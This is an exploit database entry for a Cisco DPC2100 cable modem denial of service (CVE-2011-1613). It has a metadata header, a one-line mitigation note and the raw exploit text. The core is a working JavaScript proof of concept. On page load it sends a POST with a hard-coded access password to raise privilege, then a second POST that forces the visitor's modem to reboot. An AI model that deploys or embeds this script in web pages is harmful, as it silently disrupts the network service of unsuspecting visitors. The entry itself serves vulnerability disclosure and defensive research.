Cisco DPC2100 Denial of Service

vendor:

DPC2100

by:

Daniel Smith

7,5

CVSS

HIGH

Denial of Service

CWE

Product Name: DPC2100

Affected Version From: HW:2.1/SW:v2.0.2r1256-060303

Affected Version To: HW:2.1/SW:v2.0.2r1256-060303

Patch Exists: YES

Related CWE: CVE-2011-1613

CPE: h:cisco:dpc2100

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: OSX 10.6/Win7

2010

Cisco DPC2100 Denial of Service

Executing this script on page load will cause the users modem to restart when they visit the page. This example uses javascript but can just as easily written to in another language to accomplish something similar. Attack consists of two parts. Part 1 - Privilege Escalation: POST: http://192.168.100.1/goform/_aslvl PARAMS: SAAccessLevel=2&SAPassword=W2402 Part 2 - Modem Restart: POST: http://192.168.100.1/goform/gscan PARAMS: SADownStartingFrequency=705000000

Mitigation:

Implementing a web application firewall (WAF) can help protect against this type of attack. Additionally, ensure that all software is up to date and patched.

Source

Exploit-DB raw data:

# Exploit Title: Cisco DPC2100 Denial of Service
# Date: 09/01/2010
# Author: Daniel Smith
# Software Link: http://www.cisco.com/
# Version: HW:2.1/SW:v2.0.2r1256-060303
# Tested on: OSX 10.6/Win7
# CVE: CVE-2011-1613

=======================================================
 Information
=======================================================
Executing this script on page load will cause the users modem to restart when 
they visit the page. This example uses javascript but can just as easily written
to in another language to accomplish something similar. Attack consists of
two parts.

Part 1 - Privilege Escalation:
POST: http://192.168.100.1/goform/_aslvl
PARAMS: SAAccessLevel=2&SAPassword=W2402

Part 2 - Modem Restart:
POST: http://192.168.100.1/goform/gscan
PARAMS: SADownStartingFrequency=705000000

=======================================================
 Proof of Concept (Javascript)
=======================================================
(function() {
  var b=document.getElementsByTagName('body')[0];
  var otherlib=false;
 
  if(typeof jQuery!='undefined') {
    console.log('This page already using jQuery v'+jQuery.fn.jquery);
  } else if (typeof $=='function') {
    otherlib=true;
  }
  function getScript(url,success){
    var script=document.createElement('script');
    script.src=url;
    var head=document.getElementsByTagName('head')[0],
        done=false;
    // Attach handlers for all browsers
    script.onload=script.onreadystatechange = function(){
      if ( !done && (!this.readyState
           || this.readyState == 'loaded'
           || this.readyState == 'complete') ) {
        done=true;
        success();
        script.onload = script.onreadystatechange = null;
        head.removeChild(script);
      }
    };
    head.appendChild(script);
  }
  getScript('http://code.jquery.com/jquery-latest.min.js',function() {
    if (typeof jQuery=='undefined') {
      console.log('Sorry, but jQuery wasn\'t able to load');
    } else {
	  console.log('This page is now jQuerified with v' + jQuery.fn.jquery);
	$.post("http://192.168.100.1/goform/_aslvl", { SAAccessLevel: "2", SAPassword: "W2402" } );
	  console.log('Privilege Escalation: temporarily setting SAAccessLevel to \'2\'.');
	$.post("http://192.168.100.1/goform/gscan", { SADownStartingFrequency: "705000000" } );
	  console.log('Reboot command sent.');
    }
  });
})();